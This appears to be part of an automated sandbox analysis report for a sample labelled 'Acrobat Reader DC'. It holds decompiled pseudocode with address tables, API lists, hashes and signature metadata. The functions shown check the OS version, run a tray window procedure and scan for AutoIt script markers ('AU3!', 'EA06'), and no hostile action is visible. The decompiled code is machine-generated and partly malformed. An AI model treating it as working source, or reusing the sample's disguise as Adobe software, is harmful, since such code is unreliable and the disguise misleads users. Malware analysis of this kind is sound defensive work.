                                  			E0040E500(intOrPtr* __edi, void* __eflags) {
				void* _v8;
				struct HINSTANCE__* _v12;
				struct HINSTANCE__* _v20;
				struct HINSTANCE__* _v24;
				struct HINSTANCE__* _v32;
				struct _SYSTEM_INFO _v68;
				char _v70;
				signed char _v72;
				struct _OSVERSIONINFOW _v352;
				void* __ebx;
				void* __esi;
				void* _t85;
				char _t86;
				struct HINSTANCE__* _t92;
				struct HINSTANCE__* _t97;
				intOrPtr* _t99;
				char _t105;
				intOrPtr* _t115;

				_t115 = __edi;
				_t116 = __edi + 0xc;
				E0040BC70(__edi + 0xc, __eflags);
				 *((char*)(__edi + 0x30)) = 0;
				_v352.dwOSVersionInfoSize = 0x11c;
				GetVersionExW( &_v352);
				 *((intOrPtr*)(__edi + 8)) = _v352.dwBuildNumber;
				 *__edi = _v352.dwMajorVersion;
				 *((intOrPtr*)(__edi + 4)) = _v352.dwMinorVersion;
				E00402160(__edi + 0xc,  &(_v352.szCSDVersion), _v352.dwMinorVersion, __edi);
				E0040E660(_t116);
				E0040E680(0x485330, _t116);
				_t85 =  *__edi - 5;
				 *((char*)(__edi + 0x2c)) = 0;
				 *((intOrPtr*)(__edi + 0x1c)) = 0;
				 *((intOrPtr*)(__edi + 0x20)) = 0;
				 *((intOrPtr*)(__edi + 0x24)) = 0;
				 *((intOrPtr*)(__edi + 0x28)) = 0;
				if(_t85 == 0) {
					_t86 =  *((intOrPtr*)(__edi + 4));
					__eflags = _t86;
					if(_t86 != 0) {
						__eflags = _t86 - 1;
						if(_t86 != 1) {
							__eflags = _t86 - 2;
							if(_t86 == 2) {
								__eflags = _v70 - 1;
								 *((char*)(__edi + 0x1d)) = 1;
								 *((char*)(__edi + 0x1f)) = 1;
								 *((char*)(__edi + 0x21)) = 1;
								if(_v70 != 1) {
									 *((char*)(__edi + 0x20)) = 1;
								} else {
									 *((char*)(__edi + 0x1e)) = 1;
								}
							}
						} else {
							 *((char*)(__edi + 0x1d)) = _t86;
							 *((short*)(__edi + 0x1e)) = 0x101;
						}
					} else {
						 *((short*)(__edi + 0x1c)) = 0x101;
					}
					 *((char*)(_t115 + 0x30)) = (_v72 & 0x000000ff) >> 0x00000006 & 0x00000001;
				} else {
					if(_t85 == 1) {
						_t105 =  *((intOrPtr*)(__edi + 4));
						 *((char*)(__edi + 0x1d)) = 1;
						 *((char*)(__edi + 0x1f)) = 1;
						 *((char*)(__edi + 0x21)) = 1;
						if(_t105 == 0) {
							__eflags = _v70 - 1;
							if(_v70 != 1) {
								 *((char*)(__edi + 0x23)) = 1;
								 *((short*)(__edi + 0x24)) = 0x101;
							} else {
								 *((short*)(__edi + 0x22)) = 0x101;
							}
						} else {
							if(_t105 != 1) {
								__eflags = _t105 - 2;
								if(_t105 == 2) {
									 *((short*)(__edi + 0x2a)) = 0x101;
									 *((char*)(__edi + 0x29)) = 1;
									 *((char*)(__edi + 0x27)) = 1;
									 *((char*)(__edi + 0x23)) = 1;
								}
							} else {
								 *((char*)(__edi + 0x23)) = _t105;
								 *((char*)(__edi + 0x25)) = _t105;
								if(_v70 != _t105) {
									 *((char*)(__edi + 0x27)) = 1;
									 *((short*)(__edi + 0x28)) = 0x101;
								} else {
									 *((short*)(__edi + 0x26)) = 0x101;
								}
							}
						}
					}
				}
				_v20 = 0;
				_v12 = 0;
				E0040EF60( &_v20);
				_t127 = _v12;
				if(_v12 != 0) {
					_push( &_v8);
					_v8 = 0;
					_push(GetCurrentProcess());
					 *((intOrPtr*)(E0040EF20( &_v20, _t127)))();
					if(_v8 == 1) {
						 *((char*)(_t115 + 0x2c)) = 1;
					}
				}
				_v68.dwOemId = 0;
				_v68.dwPageSize = 0;
				_v68.lpMinimumApplicationAddress = 0;
				_v68.lpMaximumApplicationAddress = 0;
				_v68.dwActiveProcessorMask = 0;
				_v68.dwNumberOfProcessors = 0;
				_v68.dwProcessorType = 0;
				_v68.dwAllocationGranularity = 0;
				_v68.wProcessorLevel = 0;
				if( *((intOrPtr*)(_t115 + 0x2c)) == 0) {
					GetSystemInfo( &_v68);
				} else {
					_v32 = 0;
					_v24 = 0;
					E0040EFD0( &_v32);
					_t130 = _v24;
					if(_v24 == 0) {
						GetSystemInfo( &_v68);
					} else {
						_t99 = E0040EF90( &_v32, _t130); // executed
						 *_t99( &_v68); // executed
					}
					_t97 = _v32;
					if(_t97 != 0) {
						FreeLibrary(_t97);
					}
				}
				_t92 = _v20;
				 *((short*)(_t115 + 0x2e)) = _v68.dwOemId;
				if(_t92 != 0) {
					FreeLibrary(_t92);
				}
				return _t115;
			}





















                                  0x0040e500
                                  0x0040e50b
                                  0x0040e510
                                  0x0040e51c
                                  0x0040e520
                                  0x0040e52a
                                  0x0040e542
                                  0x0040e54d
                                  0x0040e54f
                                  0x0040e552
                                  0x0040e557
                                  0x0040e561
                                  0x0040e56a
                                  0x0040e56d
                                  0x0040e570
                                  0x0040e573
                                  0x0040e576
                                  0x0040e579
                                  0x0040e57c
                                  0x00427674
                                  0x00427677
                                  0x00427679
                                  0x00427683
                                  0x00427686
                                  0x00427693
                                  0x00427696
                                  0x00427698
                                  0x0042769c
                                  0x004276a0
                                  0x004276a4
                                  0x004276a8
                                  0x004276b0
                                  0x004276aa
                                  0x004276aa
                                  0x004276aa
                                  0x004276a8
                                  0x00427688
                                  0x00427688
                                  0x0042768b
                                  0x0042768b
                                  0x0042767b
                                  0x0042767b
                                  0x0042767b
                                  0x004276be
                                  0x0040e582
                                  0x0040e583
                                  0x0040e585
                                  0x0040e588
                                  0x0040e58c
                                  0x0040e590
                                  0x0040e596
                                  0x00427625
                                  0x00427629
                                  0x00427636
                                  0x0042763a
                                  0x0042762b
                                  0x0042762b
                                  0x0042762b
                                  0x0040e59c
                                  0x0040e59f
                                  0x00427654
                                  0x00427657
                                  0x0042765d
                                  0x00427663
                                  0x00427667
                                  0x0042766b
                                  0x0042766b
                                  0x0040e5a5
                                  0x0040e5a5
                                  0x0040e5a8
                                  0x0040e5ae
                                  0x00427645
                                  0x00427649
                                  0x0040e5b4
                                  0x0040e5b4
                                  0x0040e5b4
                                  0x0040e5ae
                                  0x0040e59f
                                  0x0040e596
                                  0x0040e583
                                  0x0040e5bd
                                  0x0040e5c0
                                  0x0040e5c3
                                  0x0040e5c8
                                  0x0040e5cb
                                  0x0040e5d0
                                  0x0040e5d1
                                  0x0040e5da
                                  0x0040e5e0
                                  0x0040e5e6
                                  0x0040e5e8
                                  0x0040e5e8
                                  0x0040e5e6
                                  0x0040e5ee
                                  0x0040e5f1
                                  0x0040e5f4
                                  0x0040e5f7
                                  0x0040e5fa
                                  0x0040e5fd
                                  0x0040e600
                                  0x0040e603
                                  0x0040e606
                                  0x0040e60c
                                  0x004276d9
                                  0x0040e612
                                  0x0040e615
                                  0x0040e618
                                  0x0040e61b
                                  0x0040e620
                                  0x0040e623
                                  0x004276ca
                                  0x0040e629
                                  0x0040e62d
                                  0x0040e632
                                  0x0040e632
                                  0x0040e634
                                  0x0040e63f
                                  0x0040e642
                                  0x0040e642
                                  0x0040e63f
                                  0x0040e644
                                  0x0040e64b
                                  0x0040e651
                                  0x0040e654
                                  0x0040e654
                                  0x0040e65d

                                  APIs
                                  • GetVersionExW.KERNEL32(?), ref: 0040E52A
                                    • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                    • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                  • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
                                  • GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
                                  • FreeLibrary.KERNEL32(?), ref: 0040E642
                                  • FreeLibrary.KERNEL32(?), ref: 0040E654
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                                  • String ID: 0SH
                                  • API String ID: 3363477735-851180471
                                  • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                  • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
                                  • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                  • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401100 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136windowtimeregistryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1264 401100-401111 1265 401113-401119 1264->1265 1266 401179-401180 1264->1266 1268 401144-40114a 1265->1268 1269 40111b-40111e 1265->1269 1266->1265 1267 401182 1266->1267 1272 40112c-401141 DefWindowProcW 1267->1272 1270 401184-40118e call 401250 1268->1270 1271 40114c-40114f 1268->1271 1269->1268 1273 401120-401126 1269->1273 1281 401193-40119a 1270->1281 1274 401151-401157 1271->1274 1275 40119d 1271->1275 1273->1272 1277 42b038-42b03f 1273->1277 1278 401219-40121f 1274->1278 1279 40115d 1274->1279 1282 4011a3-4011a9 1275->1282 1283 42afb4-42afc5 call 40f190 1275->1283 1277->1272 1280 42b045-42b059 call 401000 call 40e0c0 1277->1280 1278->1273 1286 401225-42b06d call 468b0e 1278->1286 1284 401163-401166 1279->1284 1285 42b01d-42b024 1279->1285 1280->1272 1282->1273 1289 4011af 1282->1289 1283->1281 1291 42afe9-42b018 call 40f190 call 401a50 1284->1291 1292 40116c-401172 1284->1292 1285->1272 1290 42b02a-42b033 call 4370f4 1285->1290 1286->1281 1289->1273 1296 4011b6-4011d8 KillTimer call 401000 PostQuitMessage 1289->1296 1297 4011db-401202 SetTimer RegisterWindowMessageW 1289->1297 1290->1272 1291->1272 1292->1273 1301 401174-42afde call 45fd57 1292->1301 1297->1281 1299 401204-401216 CreatePopupMenu 1297->1299 1301->1272 1315 42afe4 1301->1315 1315->1281
                                  C-Code - Quality: 96%
                                  			E00401100(int __edi, struct HWND__* _a4, int _a8, signed int _a12) {
				struct HWND__* __ebx;
				void* __esi;
				signed int _t20;
				long _t22;
				void* _t36;
				struct HWND__* _t38;
				void* _t43;
				void* _t49;
				int _t52;
				void* _t67;

				_t52 = __edi;
				_t38 = _a4;
				if(_t38 !=  *0x497518) {
					__eflags =  *0x497518;
					if( *0x497518 == 0) {
						goto L1;
					} else {
						goto L4;
					}
				} else {
					L1:
					if(_t52 >= 0x111 || _t52 < 0x12) {
						__eflags = _t52 - 0x113;
						if(_t52 == 0x113) {
							E00401250(_a8, _t43, _t38, 0x4a8710);
							goto L15;
						} else {
							__eflags = _t52 - 0x10;
							if(__eflags <= 0) {
								if(__eflags == 0) {
									 *0x4974e6 = 1;
									E0040F190(_t43, 0x4a8178);
									goto L15;
								} else {
									_t20 = _t52 - 1;
									__eflags = _t20 - 6;
									if(_t20 > 6) {
										goto L3;
									} else {
										switch( *((intOrPtr*)(_t20 * 4 +  &M0040122C))) {
											case 0:
												__eax = SetTimer(__ebx, 1, 0x2ee, 0); // executed
												__eax = RegisterWindowMessageW(L"TaskbarCreated");
												__eflags =  *0x4a8710;
												 *0x4a95e8 = __eax;
												if( *0x4a8710 != 0) {
													goto L15;
												} else {
													__eax = CreatePopupMenu();
													_pop(__esi);
													 *0x4a8710 = __eax;
													__eax = 0;
													__eflags = 0;
													_pop(__ebx);
													return 0;
												}
												goto L35;
											case 1:
												KillTimer(_t38, 1);
												E00401000(0x4a8710);
												PostQuitMessage(0);
												__eflags = 0;
												return 0;
												goto L35;
											case 2:
												goto L3;
											case 3:
												__eax = _a12;
												__ecx = _a12;
												__edx = __ax & 0x0000ffff;
												__eax =  *0x497514;
												__ecx = _a12 >> 0x10;
												__eax = MoveWindow( *0x497514, 0, 0, __ax & 0x0000ffff, _a12 >> 0x10, 1);
												goto L15;
											case 4:
												 *0x497514 = SetFocus( *0x497514);
												goto L15;
										}
									}
								}
							} else {
								__eflags = _t52 - 0x312;
								if(__eflags > 0) {
									__eflags = _t52 - 0x401;
									if(_t52 != 0x401) {
										goto L3;
									} else {
										E00468B0E(_t67, 0x4a8710, _t38, _a12);
										goto L15;
									}
								} else {
									if(__eflags == 0) {
										__eflags =  *0x4974ec;
										if(__eflags == 0) {
											E004370F4( &_a8, __eflags,  &_a8);
										}
										goto L4;
									} else {
										__eflags = _t52 - 0x11;
										if(_t52 == 0x11) {
											asm("sbb eax, eax");
											 *0x4974f0 =  ~(_a12 & 0x80000000) + 4;
											 *0x4974e6 = 0;
											E0040F190(_t43, 0x4a8178);
											E00401A50(0x4a8178, _t49, __eflags, _t67);
											_t38 = _a4;
											goto L4;
										} else {
											__eflags = _t52 - 0x111;
											if(__eflags != 0) {
												goto L3;
											} else {
												_t36 = E0045FD57(__eflags, _t67, 0x4a8710, _a8, _a12);
												__eflags = _t36 - 1;
												if(_t36 != 1) {
													goto L4;
												} else {
													L15:
													__eflags = 0;
													return 0;
												}
											}
										}
									}
								}
							}
						}
					} else {
						L3:
						if(_t52 ==  *0x4a95e8) {
							__eflags =  *0x4974ea - 1;
							if( *0x4974ea == 1) {
								E00401000(0x4a8710);
								E0040E0C0(0x4a8710, _t67);
							}
						}
						L4:
						_t22 = DefWindowProcW(_t38, _t52, _a8, _a12); // executed
						return _t22;
					}
				}
				L35:
			}













                                  0x00401100
                                  0x00401107
                                  0x00401111
                                  0x0040117e
                                  0x00401180
                                  0x00000000
                                  0x00401182
                                  0x00000000
                                  0x00401182
                                  0x00401113
                                  0x00401113
                                  0x00401119
                                  0x00401144
                                  0x0040114a
                                  0x0040118e
                                  0x00000000
                                  0x0040114c
                                  0x0040114c
                                  0x0040114f
                                  0x0040119d
                                  0x0042afb9
                                  0x0042afc0
                                  0x00000000
                                  0x004011a3
                                  0x004011a3
                                  0x004011a6
                                  0x004011a9
                                  0x00000000
                                  0x004011af
                                  0x004011af
                                  0x00000000
                                  0x004011e5
                                  0x004011f0
                                  0x004011f6
                                  0x004011fd
                                  0x00401202
                                  0x00000000
                                  0x00401204
                                  0x00401204
                                  0x0040120a
                                  0x0040120b
                                  0x00401210
                                  0x00401210
                                  0x00401212
                                  0x00401216
                                  0x00401216
                                  0x00000000
                                  0x00000000
                                  0x004011b9
                                  0x004011c4
                                  0x004011cb
                                  0x004011d1
                                  0x004011d8
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0042af90
                                  0x0042af95
                                  0x0042af97
                                  0x0042af9a
                                  0x0042af9f
                                  0x0042afa9
                                  0x00000000
                                  0x00000000
                                  0x0042af85
                                  0x00000000
                                  0x00000000
                                  0x004011af
                                  0x004011a9
                                  0x00401151
                                  0x00401151
                                  0x00401157
                                  0x00401219
                                  0x0040121f
                                  0x00000000
                                  0x00401225
                                  0x0042b068
                                  0x00000000
                                  0x0042b068
                                  0x0040115d
                                  0x0040115d
                                  0x0042b01d
                                  0x0042b024
                                  0x0042b02e
                                  0x0042b02e
                                  0x00000000
                                  0x00401163
                                  0x00401163
                                  0x00401166
                                  0x0042aff3
                                  0x0042affd
                                  0x0042b002
                                  0x0042b009
                                  0x0042b010
                                  0x0042b015
                                  0x00000000
                                  0x0040116c
                                  0x0040116c
                                  0x00401172
                                  0x00000000
                                  0x00401174
                                  0x0042afd7
                                  0x0042afdc
                                  0x0042afde
                                  0x00000000
                                  0x0042afe4
                                  0x00401193
                                  0x00401193
                                  0x0040119a
                                  0x0040119a
                                  0x0042afde
                                  0x00401172
                                  0x00401166
                                  0x0040115d
                                  0x00401157
                                  0x0040114f
                                  0x00401120
                                  0x00401120
                                  0x00401126
                                  0x0042b038
                                  0x0042b03f
                                  0x0042b04a
                                  0x0042b054
                                  0x0042b054
                                  0x0042b03f
                                  0x0040112c
                                  0x00401136
                                  0x00401141
                                  0x00401141
                                  0x00401119
                                  0x00000000

                                  APIs
                                  • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                                  • KillTimer.USER32(?,00000001,?), ref: 004011B9
                                  • PostQuitMessage.USER32(00000000), ref: 004011CB
                                  • SetTimer.USER32 ref: 004011E5
                                  • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                                  • CreatePopupMenu.USER32(?,?,?,004010F8,?,?,?), ref: 00401204
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                  • String ID: TaskbarCreated
                                  • API String ID: 129472671-2362178303
                                  • Opcode ID: 3a68920b2457bf0ecdafc1b2be4b40edda77bb20db2372f596e363752a538359
                                  • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                                  • Opcode Fuzzy Hash: 3a68920b2457bf0ecdafc1b2be4b40edda77bb20db2372f596e363752a538359
                                  • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040F5C0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 125COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1316 40f5c0-40f5cf call 422240 1319 40f5d0-40f5e8 1316->1319 1319->1319 1320 40f5ea-40f613 call 413650 call 410e60 1319->1320 1325 40f614-40f633 call 414d04 1320->1325 1328 40f691 1325->1328 1329 40f635-40f63c 1325->1329 1330 40f696-40f69c 1328->1330 1331 40f660-40f674 call 4150d1 1329->1331 1332 40f63e 1329->1332 1335 40f679-40f67c 1331->1335 1334 40f640 1332->1334 1336 40f642-40f650 1334->1336 1335->1325 1337 40f652-40f655 1336->1337 1338 40f67e-40f68c 1336->1338 1339 40f65b-40f65e 1337->1339 1340 425d1e-425d3e call 4150d1 call 414d04 1337->1340 1341 40f68e-40f68f 1338->1341 1342 40f69f-40f6ad 1338->1342 1339->1331 1339->1334 1352 425d43-425d5f call 414d30 1340->1352 1341->1337 1344 40f6b4-40f6c2 1342->1344 1345 40f6af-40f6b2 1342->1345 1347 425d16 1344->1347 1348 40f6c8-40f6d6 1344->1348 1345->1337 1347->1340 1350 425d05-425d0b 1348->1350 1351 40f6dc-40f6df 1348->1351 1350->1336 1353 425d11 1350->1353 1351->1337 1352->1330 1353->1347
                                  C-Code - Quality: 88%
                                  			E0040F5C0(intOrPtr* _a4) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v65572;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t53;
				void* _t58;
				signed int _t59;
				signed int _t70;
				void* _t80;
				void* _t87;
				void* _t92;
				void* _t95;
				void* _t97;
				void* _t98;
				void* _t99;
				void* _t100;

				E00422240(0x10020);
				_t53 = 0;
				do {
					_t1 = _t53 + 0x4921a0; // 0xbe4b48a3
					_t2 = _t53 + 0x492198; // 0xa534c99
					 *((char*)(_t97 + _t53 - 0x20)) =  *_t1;
					 *((char*)(_t97 + _t53 - 0x18)) =  *_t2;
					_t53 = _t53 + 1;
				} while (_t53 < 8);
				E00413650( &_v12, "AU3!");
				E00410E60( &_v20,  &_v12, 4);
				_t99 = _t98 + 0x14;
				_push(_t73);
				_v16 = 0;
				while(1) {
					_t58 = E00414D04( &_v65572, 1, 0x10000,  *_a4); // executed
					_t100 = _t99 + 0x10;
					if(_t58 < 0x18) {
						break;
					}
					_t92 = _t58;
					_t13 = _t92 - 0x14; // -20
					_t95 = _t13;
					if(_t95 <= 0) {
						L10:
						_t22 = _t92 - 0x14; // -20
						_push(1);
						_push(0xffffffec);
						_push( *_a4);
						_v16 = _v16 + _t22;
						E004150D1(_t73, _v16 + _t22, _t92, _t95, _t110); // executed
						_t99 = _t100 + 0xc;
						continue;
					} else {
						_t87 = 0;
						do {
							_t80 = 0;
							while(1) {
								_t73 =  *((intOrPtr*)(_t97 + _t80 - 0x20));
								if( *((intOrPtr*)(_t97 + _t80 - 0x20)) !=  *((intOrPtr*)(_t97 + _t80 + _t87 - 0x10020))) {
									break;
								}
								_t73 =  *((intOrPtr*)(_t97 + _t80 - 0x1f));
								__eflags =  *((intOrPtr*)(_t97 + _t80 - 0x1f)) -  *((intOrPtr*)(_t97 + _t80 + _t87 - 0x1001f));
								if(__eflags == 0) {
									_t73 =  *((intOrPtr*)(_t97 + _t80 - 0x1e));
									__eflags =  *((intOrPtr*)(_t97 + _t80 - 0x1e)) -  *((intOrPtr*)(_t97 + _t80 + _t87 - 0x1001e));
									if(__eflags == 0) {
										_t73 =  *((intOrPtr*)(_t97 + _t80 - 0x1d));
										__eflags =  *((intOrPtr*)(_t97 + _t80 - 0x1d)) -  *((intOrPtr*)(_t97 + _t80 + _t87 - 0x1001d));
										if(__eflags != 0) {
											_t80 = _t80 + 3;
											break;
										} else {
											_t73 =  *((intOrPtr*)(_t97 + _t80 - 0x1c));
											__eflags =  *((intOrPtr*)(_t97 + _t80 - 0x1c)) -  *((intOrPtr*)(_t97 + _t80 + _t87 - 0x1001c));
											if(__eflags == 0) {
												_t80 = _t80 + 5;
												__eflags = _t80 - 0x14;
												if(__eflags < 0) {
													continue;
												} else {
													break;
												}
											} else {
												_t80 = _t80 + 4;
												break;
											}
										}
									} else {
										_t80 = _t80 + 2;
										break;
									}
								} else {
									_t80 = _t80 + 1;
									break;
								}
								L24:
							}
							if(_t80 == 0x14) {
								_t96 = _a4;
								_t47 = _t87 + 0x14; // 0x14
								_push(0);
								_push(_v16 + _t47);
								_push( *_a4); // executed
								E004150D1(_t73,  *_a4, _t92, _a4, __eflags); // executed
								E00414D04( &_v12, 1, 4,  *_t96); // executed
								_v8 = 0;
								_t70 = E00414D30( &_v12, "EA06");
								asm("sbb eax, eax");
								_t59 =  ~_t70 & 0x00000004;
							} else {
								goto L9;
							}
							goto L14;
							L9:
							_t87 = _t87 + 1;
							_t110 = _t87 - _t95;
						} while (_t87 < _t95);
						goto L10;
					}
					L14:
					return _t59;
					goto L24;
				}
				_t59 = 3;
				goto L14;
			}
























                                  0x0040f5c8
                                  0x0040f5cd
                                  0x0040f5d0
                                  0x0040f5d0
                                  0x0040f5d6
                                  0x0040f5dc
                                  0x0040f5e0
                                  0x0040f5e4
                                  0x0040f5e5
                                  0x0040f5f3
                                  0x0040f602
                                  0x0040f607
                                  0x0040f60a
                                  0x0040f60c
                                  0x0040f614
                                  0x0040f628
                                  0x0040f62d
                                  0x0040f633
                                  0x00000000
                                  0x00000000
                                  0x0040f635
                                  0x0040f637
                                  0x0040f637
                                  0x0040f63c
                                  0x0040f660
                                  0x0040f666
                                  0x0040f66c
                                  0x0040f66e
                                  0x0040f670
                                  0x0040f671
                                  0x0040f674
                                  0x0040f679
                                  0x00000000
                                  0x0040f63e
                                  0x0040f63e
                                  0x0040f640
                                  0x0040f640
                                  0x0040f642
                                  0x0040f642
                                  0x0040f650
                                  0x00000000
                                  0x00000000
                                  0x0040f67e
                                  0x0040f685
                                  0x0040f68c
                                  0x0040f69f
                                  0x0040f6a6
                                  0x0040f6ad
                                  0x0040f6b4
                                  0x0040f6bb
                                  0x0040f6c2
                                  0x00425d16
                                  0x00000000
                                  0x0040f6c8
                                  0x0040f6c8
                                  0x0040f6cf
                                  0x0040f6d6
                                  0x00425d05
                                  0x00425d08
                                  0x00425d0b
                                  0x00000000
                                  0x00425d11
                                  0x00000000
                                  0x00425d11
                                  0x0040f6dc
                                  0x0040f6dc
                                  0x00000000
                                  0x0040f6dc
                                  0x0040f6d6
                                  0x0040f6af
                                  0x0040f6af
                                  0x00000000
                                  0x0040f6af
                                  0x0040f68e
                                  0x0040f68e
                                  0x00000000
                                  0x0040f68e
                                  0x00000000
                                  0x0040f68c
                                  0x0040f655
                                  0x00425d21
                                  0x00425d24
                                  0x00425d2a
                                  0x00425d2c
                                  0x00425d2d
                                  0x00425d2e
                                  0x00425d3e
                                  0x00425d4c
                                  0x00425d50
                                  0x00425d5a
                                  0x00425d5c
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040f65b
                                  0x0040f65b
                                  0x0040f65c
                                  0x0040f65c
                                  0x00000000
                                  0x0040f640
                                  0x0040f696
                                  0x0040f69c
                                  0x00000000
                                  0x0040f69c
                                  0x0040f691
                                  0x00000000

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __fread_nolock_fseek_memmove
                                  • String ID: AU3!$EA06
                                  • API String ID: 3969463491-2658333250
                                  • Opcode ID: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                  • Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
                                  • Opcode Fuzzy Hash: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                  • Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004115D7 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 41COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1356 4115d7-4115df 1357 4115ee-4115f9 call 4135bb 1356->1357 1360 4115e1-4115ec call 411988 1357->1360 1361 4115fb-4115fc 1357->1361 1360->1357 1364 4115fd-41160e 1360->1364 1365 411610-41163b call 417fc0 call 41130a 1364->1365 1366 41163c-411656 call 4180af call 418105 1364->1366 1365->1366
                                  C-Code - Quality: 92%
                                  			E004115D7(void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v0;
				char _v8;
				char _v20;
				void* _t11;
				struct HINSTANCE__* _t12;
				struct HINSTANCE__* _t16;
				void* _t26;
				void* _t27;
				void* _t29;

				_t29 = __esi;
				_t27 = __edi;
				while(1) {
					_t11 = E004135BB(_t26, _t27, _t29, _a4); // executed
					if(_t11 != 0) {
						break;
					}
					_t12 = E00411988(_a4);
					__eflags = _t12;
					if(_t12 == 0) {
						__eflags =  *0x49664c & 0x00000001;
						if(( *0x49664c & 0x00000001) == 0) {
							 *0x49664c =  *0x49664c | 0x00000001;
							__eflags =  *0x49664c;
							_push(1);
							_v8 = "bad allocation";
							E00417FC0(0x496640,  &_v8);
							 *0x496640 = 0x482a2c;
							E0041130A( *0x49664c, 0x425bee);
						}
						E004180AF( &_v20, 0x496640);
						_v20 = 0x482a2c;
						E00418105( &_v20, 0x48ceac);
						asm("int3");
						_t16 = GetModuleHandleW(L"mscoree.dll");
						__eflags = _t16;
						if(_t16 != 0) {
							_t16 = GetProcAddress(_t16, "CorExitProcess");
